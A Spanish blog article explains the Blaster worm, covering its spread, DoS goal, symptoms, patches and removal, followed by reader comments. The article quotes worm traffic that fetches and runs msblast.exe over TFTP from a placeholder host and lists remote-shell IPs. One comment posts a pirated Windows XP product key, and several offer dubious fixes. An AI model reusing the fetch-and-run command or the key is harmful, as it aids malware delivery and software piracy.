Blaster, un gusano que está causando estragos. Descúbrelo todo acerca de él.

Hace ya tiempo Microsoft anunciaba una grave vulnerabilidad denominada RPC DOM en los sistemas Windows NT/2000/XP/2003. Por entonces los expertos en seguridad ya preveían algún gusano que explotase dicha falla. No ha tardado mucho, este mismo lunes el gusano Blaster entraba en escena valiéndose de esta vulnerabilidad. La principal manifestación o síntoma que podemos notar son los constantes reinicios de nuestra computadora. ¿Cómo actua? ¿Cuál es su finalidad? ¿Por qué resetea la máquina? ¿Cómo ver si estamos infectados? ¿Cómo prevenirlo? ¿Cómo librarnos de él? (Sigue leyendo).¿CÓMO ACTUA?

El gusano rastrea IP’s en busca de sistemas operativos Windows (sólo versiones NT 4.0 / NT 4.0 Terminal Services Edition / 2000 / XP / Server 2003) con el acceso permitido al puerto 135/TCP. Una vez localizada la futura victima hace uso de la reciente vulnerabilidad “Desbordamiento de Búfer en RPC DCOM” que Windows anunciaba el 16 de Julio. Acto seguido utiliza el puerto 4444/TCP y abre una sesión TFTP con un shell remota, desde donde descarga los binarios de Blaster bajo el nombre de fichero msblast.exe. Este se suele descargar al directorio C:\Windows\System32 o C:\WINNT\System32 (dependiendo del sistema operativo). Ocupa 6176 Bytes.

Este sería un ejemplo del tráfico detectado en una máquina infectada:

————-tráfico 4444/tcp———-

tftp -i aaa.bbb.ccc.ddd GET msblast.exe

start msblast.exe

msblast.exe

HTTP/1.0 403 Forbidden

Server: AdSubtract 2.50

Content-Type: text/html;charset=utf-8

Content-Length: 349

<html>

<head>

<meta http-equiv="Pragma" content="no-cache">

<meta http-equiv="Content-Type" content="text/html;charset=utf-8">

<title>Forbidden</title>

</head>

<body>

<h1>Forbidden</h1>

<h2>Requests from host hostname.of.attacking.host/aaa.bbb.ccc.ddd not

allowed; only requests from localhost (127.0.0.1) are allowed.

</h2>

</body></html>

————-tráfico 4444/tcp———-

Las shells remotas donde conectarse pueden ser alguna de las siguientes:

204.210.57.87

217.211.179.193

24.147.64.171

24.147.64.205

24.147.64.208

24.147.65.146

24.147.65.45

24.147.65.9

61.254.65.159

67.119.36.219

68.112.65.38

68.166.102.136

68.166.107.21

68.166.111.175

68.166.120.34

68.166.121.135

68.166.123.4

68.166.124.186

68.166.124.93

68.166.139.155

68.166.139.210

68.166.141.66

68.166.142.194

68.166.142.215

68.166.36.178

68.166.56.123

68.166.60.51

68.166.98.3

¿CÚAL ES SU FINALIDAD?

La principal función para la cual a sido programado este código es la de llevar a cabo un ataque de denegación del servicio orientado hacia el sitio www.microsoftupdate.com. Los ataques están programados en las siguientes fechas:

* En los meses de enero a agosto, el gusano lanzará un ataque de denegación de servicio desde el día 16 de esos meses hasta el 31.

* El resto de meses, de septiembre a diciembre, el gusano lanzará ese ataque todos los días del mes.

¿POR QUÉ RESETEA LA MÁQUINA?

Si bien es cierto que este código está escrito para llevar a cabo un ataque distribuido de denegación de servico contra windowsupdate.com, pero según informa hispasec, posee 2 exploits diferentes con los que atacar, dependiendo del sistema operativo. El problema reside en que no es capaz de distinguir entre sistemas y lanzar uno u otro exploit. Un error al enviar dicho exploit es lo que puede provocar que se detenga svchost.exe, y por tanto se reinicie la computadora. Pero en ningún caso es algo para lo que haya sido diseñado.

¿CÓMO PODEMOS VER SI ESTAMOS INFECTADOS?

Podemos comprobarlo mediante varios puntos:

1. Si experimentamos reinicios constantes e involuntarios en nuestra máquina

2 . Si notamos cierta elevación en el uso de los puertos 135/TCP, 4444/TCP y 69/UDP

3 . Si en el registro de Windows (ejecutar > regedit) en la cadena “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\” aparecen las claves “Run "windows auto update" = msblast.exe” o “Run "windows auto update" = msblast.exe I just want to say LOVE YOU SAN!! Hill”

¿CÓMO PODEMOS PREVENIRLO?

Lo primordial es instalar el parche que Windows ofrece para dicha vulnerabilidad. Dependiendo de la versión del sistema operativo que usemos disponemos de los siguientes parches:

Windows NT 4.0 Server

Windows NT 4.0 Terminal Server Edition

Windows 2000

Windows XP 32 bit Edition

Windows XP 64 bit Edition

Windows Server 2003 32 bit Edition

Windows Server 2003 64 bit Edition

Nota: la mayoría de nosotros trabajamos con 32 bits, a no ser que usemos un procesador de 64 bits como el AMD Opteron.

También podemos desactivar la función de NetBios en las opciones de Windows (propiedades de la conexión de red > protocolos) o bloquear el puerto 135/TCP mediante algún cortafuegos para que sea imposible acceder a él desde el exterior.

¿CÓMO PODEMOS ELIMINARLO?

A través de varios pasos:

Terminar el proceso asociado al gusano

1. Abrir el administrador de tareas de windows (CTRL+SHIFT+ESC) y seleccionar las pestaña "Procesos"

2. En la lista que aparece, seleccionar el proceso MSBLAST.EXE y pulsar el botón "Terminar proceso"

3. Comprobar que se ha finalizado ese proceso (cerrando el administrador de tareas, volviéndolo a abrir y comprobar que no aparece en la lista).

4. Cerrar el administrador de tareas.

Borrar entradas en el registro

1. Abrir el editor del registro (pulsar Inicio->Ejecutar, escribir regedit y pulsar la tecla Enter).

2. En el panel izquierdo, hacer doble click en: HKEY_LOCAL_MACHINE>Software>Microsoft>Windows>CurrentVersion>Run

3. En el panel derecho, localizar y borrar la entrada ”windows auto update" = MSBLAST.EXE

4. Cerrar el editor del registro.

Instrucciones adicionales para usuarios de Windows XP

Para estos usuarios, además de los pasos anteriores, es preciso deshabilitar el "System Restore" de Windows XP. Para ello:

1. Entrar como admistrador del sistema

2. Doble click sobre "Mi PC" (en el escritorio) y pinchar en "Propiedades"

3. Ir a System Restore

4. Seleccionar "Deshabilitar System Restore"

5. Pulsar Aplicar > Sí > Aceptar

Escaneado y borrado definitivo con el antivirus

Indicar al antivirus instalado que haga un escaneado de todo el sistema (asegurarse antes de que el antivirus contenga las últimas actualizaciones). Caso de no tener antivirus, ir al directorio System32 (normalmente C:\Windows\System32 o C:\WINNT\System32) y ahí borrar completamente el fichero MSBLAST.EXE.

Sitios para hacer un scan y eliminación del virus online:

System Cleaner de Trend Micro

Blaster Removal Tool de Symantec

Herramienta de Computer Associates

PQRemove de Panda Software

Aplicar parche

Por supuesto deberemos aplicar el parche de la vulnerabilidad para que no pueda volver a infectarnos. Los parches para cada sistema operativo están listados en el punto anterior.

Más información en:

Trend Micro

Panda Software

McAfee

Symantec

PerAntivirus

VS Antivirus

Enciclopedia Virus (Ontinent)

Sophos

Computer Associates

Alerta Antivirus

Hispasec

Microsoft

Categorias: Internacional

Etiquetas:

61s Comentarios

  1. Pues si se ataca a la mocosoft xq no dejarse infectar…no? la pena q yo tengo win98, yo diria q mejor q la gente se deje infectar y cuando llege uno de esos dias el IMPERIO DE MOCOSOFT CAERA,no?? juass q guayy!!:P:P

    Tmp es tan dañino… cuando veamos x la tele q mocosoft pierde $$$$ entonces ya aremos uso de esa cura…:D

    Venga gentee saludos!!!

  2. En cierta manera comparto lo que dices,lo malo es que esta vulnerabilidad puede ser aprovechada para entrar en nuestros pcs

    Anoche me recorrí muchos foros y en todos ellos había algo en común,la mayoría de la gente navega sin cortafuegos ni antivirus y tampoco se bajan las actualizaciones de seguridad de Microsoft

    Espero que toda esta movida conciencie a la peña para que tengan más en cuenta el navegar con seguridad,aunque lo dudo mucho

    Saludos

  3. Y que lo digas…

    A mi me pasó el lunes, y me volvi loco, como no podia ni conectarme a internet mas de 1 o 2 minutos para mirar la solucion, me costó bastante arreglarlo…

    :/

  4. Pues vaya… ya lo podrian haber exo para q no se reseteara… solo de fundir a la empresa en la ruina… la ancagado poniendo eso xa q se resetee… Si alguno los conoce xq no le dice q haga uno mas silencioso… y q el momento del gran dia todos ataken compenetrados??

    A lo mejor cada reseteo es cada atake q efectua contra la mocosoft y el pc se reinicia xa no ser contestado x un firewall o xa q no te localizen…(es lo q me da a pensar…)

    Saludos gente.

  5. “¿POR QUÉ RESETEA LA MÁQUINA?

    Si bien es cierto que este código está escrito para llevar a cabo un ataque distribuido de denegación de servico contra windowsupdate.com, pero según informa hispasec, posee 2 exploits diferentes con los que atacar, dependiendo del sistema operativo. El problema reside en que no es capaz de distinguir entre sistemas y lanzar uno u otro exploit. Un error al enviar dicho exploit es lo que puede provocar que se detenga svchost.exe, y por tanto se reinicie la computadora. Pero en ningún caso es algo para lo que haya sido diseñado.”

    Un saludo 😉

  6. Se dice q hay un gusano parecido o es el mismo blaster, q se aprovecha de una vulnerabilidad en los Modems ADSL, es un rumor q me ha llegado, pero no se q hay de cierto en el. Y kedarse sin ADSL no lo hace gracia a nadie :-s
  7. Otro afectado!!

    El lunes me salio la jodida cuenta atras una vez, pero como me iba a tomar unas copillas no le preste mucha atencion.

    Cuando llegue a eso de las 8 de la mañana pongo el ordena y tal y ni conexion ni nada, y lo mejor que cada cierto tiempo me salia la cuenta atras de un minuto para reiniciar, vamos que te lo reiniciaba solo, asi que ya si que me mosqueo.

    Me pongo el portatil e igual (xp tambien claro), menos mal que en el otro tengo el 98 y pude descargarme las cosillas y mirar de que se trataba, porque llame a mi ISP y hasta las 2 de la tarde no me dijeron que era el blaster este, cosa que ya sabia claro.

    Cuando llame a telefonica me contesto una chiquita (muy maja por cierto, y con una voz realmente bonita, en serio quede sorprendido) y me cuena todo esto del virus y tal y me dice…. pero no te preocupes que no hace nada, uummm….hombre si que me escanee la ip y demas no es nada…o lo que es aun peor, que cada cierto tiempo se m reinicie el pc, porque hubo un rato que en cuestion de 20 minutos se me reinicio como 15 veces, eso sin decir que tenia conexion menos tiempo aun de lo que tardaba en salir la cuenta atras para reiniciarse.

    Ahh yo tengo cortafuegos, antivirus y me bajo todas las actualizaciones de microsoft, asi que ya veis…

    Perdonar por el rollete….

    Saludos,

  8. Pués si con todas esas medidas de seguridad y actualizado con todos los parches de M$……. ¿cual es la solución?

    Había oido que el XP es más seguro que el 98 (además que es para empresas), ¿hay que volver al 98/95/3.11?

    Cada día me gusta más el software libre.

    Un saludo.

  9. Hola a todos: yo tb me he infectado con el puñetero Blaster y quitarlo es muy sencillo con las instruccciones del artículo. Lo que no me resulta fácil es evitar que aparezca de nuevo: me bajo el parche de M$ y me dice que no me reconoce el lenguaje. Os aseguro que me bajo el parche bueno, es decir, el XP para plataformas de 32 bits (WindowsXP-KB823980-ia64-ENU.exe). Al intentar ejec.. me dice “Setup cannot update your Windows XP files because the language installed on your system is different from the update language”.

    ¿Alguna sugerencia?

    Por supuesto mi XP es pirata. ¿Será por eso?

    Un saludo 😉
  10. Yo creo q no tiene nada q ver q sea pirata… podria ser q el “supuesto gusano” te aya modificao los arxivos… o q tengas aparte del Blaster otro x hay rondando…
  11. El problema reside en que los enlances del artículo apuntan a la web de descarga en inglés. Ahí el que te de problema de incompatibilidad con lso lenguajes, puesto que estás usando windows xp en español e intentas instalar un parche preparado para la versión anglosajona.

    De todos modos, con cambiar en la columna de la derecha (justo debajo del boton Download) el lenguaje a español es suficiente.

    Para evitar confusiones he cambiado los enlaces a las descargas directas en español.

    Un saludo

  12. El que semejante chorrada de virus esté causando tanto alboroto es síntoma de lo desprotegida que anda la peña. Un usuario no tiene por qué nacer sabiendo lo que es un cortafuegos, por eso los proveedores de Internet, como mínimo, deberían alertar a sus clientes de estas cosas. Sobre todo los que proporcionan esos kits ADSL que abren con alegría NetBios, instalan protocolos inseguros y demás jamonadas.

    Evitar al Blaster de los huevos es tan sencillo como:

    -Tener instalado un cortafuegos (esto es de cajón).

    -Tenerlo bien configurado. Bien, los cortafuegos por software se instalan con todos los puertos en modo invisible y es el usuario el que los va abriendo. Aquí reside el peligro: que a toda la gente le haya dado por abrir tan alegremente el puerto 135 como si nada.

    Si al menos fuera uno con un número extraño, aún se comprendería; pero el 135 es sospechosamente parecido al infausto 137 de NetBios y sólo eso debería haber bastado para tomar precauciones.

    Como también habría sido suficiente con negar el acceso al “Generic Host Process for Win32 Services”, que es el servicio al que se conecta el troyano. ¿Es que los que van admitiendo reglas para el cortafuegos, permiten el tráfico a programas desconocidos? Para eso, mejor no tenerlo y así liberan RAM.

    Puedo haber sonado borde, pero es un aviso necesario: tomáos en serio la seguridad de vuestro sistema. De lo contrario, no tardaréis mucho en echar de menos una copia de seguridad de vuestros perdidos datos. Blaster no es destructivo. A lo mejor el próximo formatea vuestro disco duro.

  13. Adeseletero …… no te has bajado bueno pach de widows ….. el la derecha arriva hay una ventanita donde te pregunta para que idioma quieres bajar pach , asi selecionas lenguage – Spanish.

    Yo me baje primera vez version en ingles , pero luego me di cuenta.

    Salu2
  14. mmmmm pos a mí el lunes tb me apareció el fistro este de aviso todo el rato que se reiniciaba y dije “jorl, esto tiene pinta de virus” pero como decía algo de un NT\ weno no sé un mensaje así rarín de la carpeta dije… mmm voy a reinstalar el winxp, pq si es un archivo de winxp que está chungo y me da este error pos lo machaco…. y eso que hice. Pero después de hacerlo mi módem 3com la lucecita del Data parpadeaba sólo de vez en cuando sin dejarme conectar.

    Después llamo a telefónica y me dice que esto es de la gente de la Campus party que está usando las IP y que están hackeando y no sé cuántos… ¬_¬’ me envían el técnico de telefónica para mirar que no sea problema de mi router; viene me dice que formatee mi pc…. ayer formatee mi pc, le puse win98, le instalé el módem, configuré las TCP/IP las DNS, los VPI y los VCI y esas cosas… y oh sorpresa, el modem está igual igual que cuando reinstalé el WinXP… con el módem y su luz de DATA parpadeando una vez cada 40 seg… por ejemplo.

    Alguien… que haya pasado por el virus, o que tenga el mismo modem 3com ADSL 4128 me parece que es… o 4218… algo así me parece recordar…. ¿le pasa lo mismo? o sabe pq me pasa? :'( pq me pasan las cosas antes de coger vacaciones snif snif….

    …no sé si me expliqué… ^_^’

  15. Lamentablemente debí ser uno de los primeros en pillarlo, puesto que el miercoles 6 por la mañana empezó a hacer cosas raras el ordenador y claro en esas fechas nada se sabia del puto virus. Pensaba que fue un pico de voltaje, porque me reiniciaba el ordenador, una de estas no me reconocia el teclado, otra me cambio la bios y me aparecio el mensaje “CPU UNWORKABLE”, lo nunca visto. Arregle la bios, entre de nuevo, pase el antivirus, pero todavia no debia estar incluido este virus porque se actualiza automaticamente y no lo pilló. Todo funcionaba bien aparentemente pero a velocidad de pentium II (tengo un pentium IV comprado hace 1 mes), me reiniciaba cada dos por tres y esta semana ya vi lo del virus en el periodico, internet, etc..y ayer lo estuve limpiando y reparando.

    Sin embargo el windows xp sigue yendo lento, no funciona como antes. Da problemas al conectarse a internet. Y cada vez que reinicio me sale una puta ventana antes de cerrar el windows que dice algo asi como que la aplicación Wnd for RNAdm tiene que cerrar apropiadamente y guarda no se que datos, al final de error y hay que darle a Finalizar aplicación para que reinicie ¿alguien sabe que cojones es eso??? ¿como hago para que el windows xp y el ordenador vayan como antes?? he hecho todo lo que habeis dicho para eliminar el virus, lo unico que me falta es añadir el parche que lo haré esta tarde, pero vamos, no he conectado a internet desde que lo limpie y sigue yendo lento.
  16. Lamentablemente debí ser uno de los primeros en pillarlo, puesto que el miercoles 6 por la mañana empezó a hacer cosas raras el ordenador y claro en esas fechas nada se sabia del puto virus. Pensaba que fue un pico de voltaje, porque me reiniciaba el ordenador, una de estas no me reconocia el teclado, otra me cambio la bios y me aparecio el mensaje “CPU UNWORKABLE”, lo nunca visto. Arregle la bios, entre de nuevo, pase el antivirus, pero todavia no debia estar incluido este virus porque se actualiza automaticamente y no lo pilló. Todo funcionaba bien aparentemente pero a velocidad de pentium II (tengo un pentium IV comprado hace 1 mes), me reiniciaba cada dos por tres y esta semana ya vi lo del virus en el periodico, internet, etc..y ayer lo estuve limpiando y reparando.

    Sin embargo el windows xp sigue yendo lento, no funciona como antes. Da problemas al conectarse a internet. Y cada vez que reinicio me sale una puta ventana antes de cerrar el windows que dice algo asi como que la aplicación Wnd for RNAdm tiene que cerrar apropiadamente y guarda no se que datos, al final de error y hay que darle a Finalizar aplicación para que reinicie ¿alguien sabe que cojones es eso??? ¿como hago para que el windows xp y el ordenador vayan como antes?? he hecho todo lo que habeis dicho para eliminar el virus, lo unico que me falta es añadir el parche que lo haré esta tarde, pero vamos, no he conectado a internet desde que lo limpie y sigue yendo lento. AYUDA POR FAVOR
  17. Pues lo mejor seria q lo formatearas y q te pusieras el w98 segunda edicion si kieres… Total es el mismo wind xo me imagino q con muxos menos agujeros NEGROS y reparables… xq aunke te saken un parxe xa arreglarlo ya ese mismo parxe tendra otros errores…

    Yo tengo el win98 y me va to de coña:D

    Saludos!!

  18. Siento decirte que sin instalarte el parche puedes volver a pillar el virus cada vez que te conectes.

    Instalate el parche cuanto antes y despues pasa el antivirus de nuevo, y procura no conectarte hasta que no instales el parche, ya que de lo contrario estras expuesto otra vez.

    Un saludo,

  19. hola socio, no creo q sea pq es pirata tu sistema operativo.

    yo tengo el original de xp……………..y nà d nà

    me dice lo mismo q a tí del puñetero lenguaje……………………

    lo has arreglado?

    pues dime como pq yo sigo jodido

    saludos.
  20. el caso es que lo he borrado pero no me deja abrir win media player,(mepone memoria insuficiente) no me deja copiar archivos,… vamos que me ha tocado un poco el ordenador. TAmpoco puedo entrar a las págs de microsoft, Me podeis ayudar por favor. gracias
  21. Y si lo formateas? te metes el win98, zone alarm, port bloked, panda platinium o lo q kieras y ya esta tiuu!!! despues cuando lo tengas to, te bajas el internet explore ultimo, reproductor multimedia, directx 9… y lo q te de la real gana;)

    Q diferencias hay entre el w98 y el win mile,xp…

    Para mi la direfencia es q solo el w98 es algo “antiguo”… xo para mi tods son =les… pake ponerme el mile, xp… Si lo unico q hacen es sacar versiones y mas versiones los de la mocosof xa seguir recolectando $$$ y q cada vez los wimdosw sean cada vez + inseguros xa un usuario de internet…

    Bueno genteee saludoss!!

    PD: Seguro q el apagon de luz en New shit a sido x un atake informático a las centrales:P:P xDDDD!!! “ese es el gran imperio”…

  22. -Windows NT/2000/XP (en adelante, NT) gestiona mucho mejor la RAM que Windows 95/98/Me (en adelante, 9x). Con 256MB o más, Win 98 se vuelve gilipollas. Por experiencia propia.

    -Windows NT tiene el sistema de archivos NTFS, que es más eficaz y seguro.

    Y en cuanto a esto del Blaster: Windows NT + puerto 135 bloqueado = Windows 98 (en cuestión seguridad).

    Windows NT seguro es mucho mejor que Windows 9x seguro, para una máquina moderna. En mi portátil con su Pentium 100, es evidente que voy a conservar el Win95… a no ser que lo sustituya por Linux.

  23. el compañero hard tiene razon solo basta con modificar el lenguaje justo debajo de download en la pagina de descarga del parche
  24. UNA COSA SOLO. PA LOS QUE ESTEN DESESPERADOS CON EL REINICIO, cambiar la fecha del ordenador a un año antes, y ya tendreis el tiempo necesario de pasar el antivirus y el patch de microsoft. agur.
  25. La solucion sobre lo del reinicio la descubri yo sin saber nada sobre el virus, ni siquiera que lo tenia. Abres panel de control, rendimiento y mantenimiento, herramientas administrativas, servicios y alli buscas un servicio llamado LLAMADA A PROCEDIMIENTO REMOTO (RPC). Das boton derecho y propiedades. Abres la pestaña de recuepracion y pones tras todos los errores (1º, 2º y 3º) no efectuar ninguna accion. Asi el prolema del reinicio abra sido solucionado. Las formas de borrar el virus buscarlas en http://www.trendmicro.com o http://www.symantec.com Eso es todo, y por ultimo bajen el parche de seguridad buscando en http://www.windowsupdate.com la frase blaster. Xao
  26. La solucion sobre lo del reinicio la descubri yo sin saber nada sobre el virus, ni siquiera que lo tenia. Abres panel de control, rendimiento y mantenimiento, herramientas administrativas, servicios y alli buscas un servicio llamado LLAMADA A PROCEDIMIENTO REMOTO (RPC). Das boton derecho y propiedades. Abres la pestaña de recuepracion y pones tras todos los errores (1º, 2º y 3º) no efectuar ninguna accion. Asi el prolema del reinicio abra sido solucionado. Las formas de borrar el virus buscarlas en http://www.trendmicro.com o http://www.symantec.com Eso es todo, y por ultimo bajen el parche de seguridad buscando en http://www.windowsupdate.com la frase blaster. Xao
  27. seguramente tu clave es la de mucha gente, FCKGW-RHQQ2…..

    Busca como reactivar windows con otra clave 7fmm3-w4fmp-4wrxx-bkdrt-7hg48 , esta te deja actualizar windows, service pack y esas cosillas, lo que interesa primero son las actualizaciones críticas
  28. Intenta hacer una restauración de sistema con fecha anterior a l infección del virus , a mi me ha funcionado.
  29. Intenta hacer una restauración de sistema con fecha anterior a l infección del virus , a mi me ha funcionado.

  30. Intentar hacer una restauración de sistema con fecha anterior a la infección del virus , a mi me ha funcionado.

    Por cierto está a pleno rendimiento.

  31. Me respondo a mi mismo: he instalado correctamente el parche, pero no funciona bien o yo no sé que carajo pasa. Si no bloqueo con un firewall, me sigue entrando el puñetero.

    Alguna sugerencia???
  32. Estoy contigo. Aquí hay demasiada alegría, poca información por parte de quien debería darla y algún día se pagara caro…
  33. SOS!!!! Ya baje el parche de la pagina de microsoft.com, pero al instalarlo me da el siguiente error: ” KB823980 Set up error. Set up could not verify the integrity of the file UPDATE.INF. Make sure the Cryptographic service is running on this computer. ” Que puedo hacer para instalar el parche. Mi computadora no me deja ir a ciertas paginas de internet, sobre todos las que tienen seguridad como passwords, o requieren tarjetas de credito. Gracias de antemano por cualquier ayuda o comentarios al respecto.
  34. A mí me pasa lo mismo,colega !! Supongo que será por que tenemos el XP en español y el parche es en inglés….no sé.A ver si algun colega nos da la solucion.

    SALUDOS!!-:)

  35. se lo dije a un colega de casualidad y me lo dijo, que si no lo dijera nunca usaria internet, (ya lo solucione)
  36. Yo tengo un problema con mi maquina que parece estar infectado con ese gusano que resetea la maquina, el problema es que mi maquina tiene el windows 98 y por lo que lei ese solo infecta windows NT, 2000, XP.

    Si eso es cierto entonces porque mi maquina se resetea solo, cada vez que estoy en algun juego lo hace, en cualquier juego, antes creia que era el juego el que estaba mal pero me pasa con todos los juegos.

    Quisiera que me ayudaran con este problema que me aconsejen, etc.. Estare muy agradecido.

    Escribanme a: rafael_18633@hotmail.com
  37. Con un sistema win98 2 edicion , he tenido un problema de bloqueos constantes y un funcionamiento mucho mas lento al cabo de unos minutos de arrancar , despues de pasar todos los antivirus conocidos , lo he reparado con el fixblaster de simantec y lo he reparado , por lo que creo que hay un tipo que se afecta al 98
  38. Hola a todos!

    Yo soy nuevo en esto.

    Mi equipo se reinicia al instante.

    Pero no tengo red alguna.

    Creo que estoy infectado con el virus Blaster por lo que he leido.

    Pero en mi equipo yo tengo instalado WIN98

    Podeis decirme que puedo hacer para eliminarlo.

    Muchas gracias a todos.
  39. En mi caso apenas va entrando cuando se reinicia…… si alguien tiene la solucion y puede y quiere ayudarme, se los agradezco
  40. Si quereis ganar un tiempo extra para eliminar el virus, retrasar el reloj del sistema cuando os aparezca la ventana en la que dice que se va a reiniciar el equipo.
    Podeis retrasarlo tanto como querais y observareis como el tiempo que pone hasta que se reinicie el ordenador se retrasara tanto como retraseis el reloj vosotros
  41. molo encuentro talvez no tiene el mismo nombre porque no loencuentro en el administrador de windows.en el editor de registros tempoco que sepuede hacer
  42. Realmente no se que mas hacer, he escaneado mi disco duro con el anti sasser y el anti blaster y no pasa nada, pero tengo una vulnerabilidad con el archivo LSASS.exe y se me reinicia el pc, h einstalado el xp como 3 veces, pero como es una version mas antigua me ataca hasta que lo parcho, pero en verdad el sistema se torna cada vez mas inestable aunque no se reinicie con la cuenta regresiva.

    Que onda, ya no se que hacer, me estoy volviendo loco y necesito trabajar en mi pc.
    Gracias

    shlotterbeck@hotmail.com

  43. Ojito Ojito, y opinando sobre la Microsoft, nos hace ver que es un sistema operativo prácticamente inestable, tiene un monton de huecos que cualquiera puede acceder a los puertos facilmente, a este paso todos tendremos que usar Linux…………
  44. Yo tambien tengo una cuenta atras,creí que era Blaster,pero no es asi,le he metido el parche y lo e buscado con el antivirus para blaster y no lo a encontrado ,y al conectarme me sale la cuenta atras no se que hacer?Ayuda porfavor!!
  45. bns noches, interesante la informacion de este gusano ya que este lunes 14 se me infectaron todas mis makinas de una cabina de internet con 17 pcs
    y no teniamos informacion de este gusano, y tubimos que formatear toditas las makinas.

    Por favor indicanos si el congelador es util para estos casos.

    Saludos cordiales

    Manuel Ballon Rivera
    mballon49@terra.com

  46. A mi me pasa lo mismo Con el puto ISas toy buscando eso por algun lao pero me da el mismo error 🙁 como me jode puto windows y puto blaster…. tengo 3 antivirus con clave y nada el mismo error….. si sabes como kitarlo por fabor dime como a esta direccion kiketon28@hotmail.com GRacias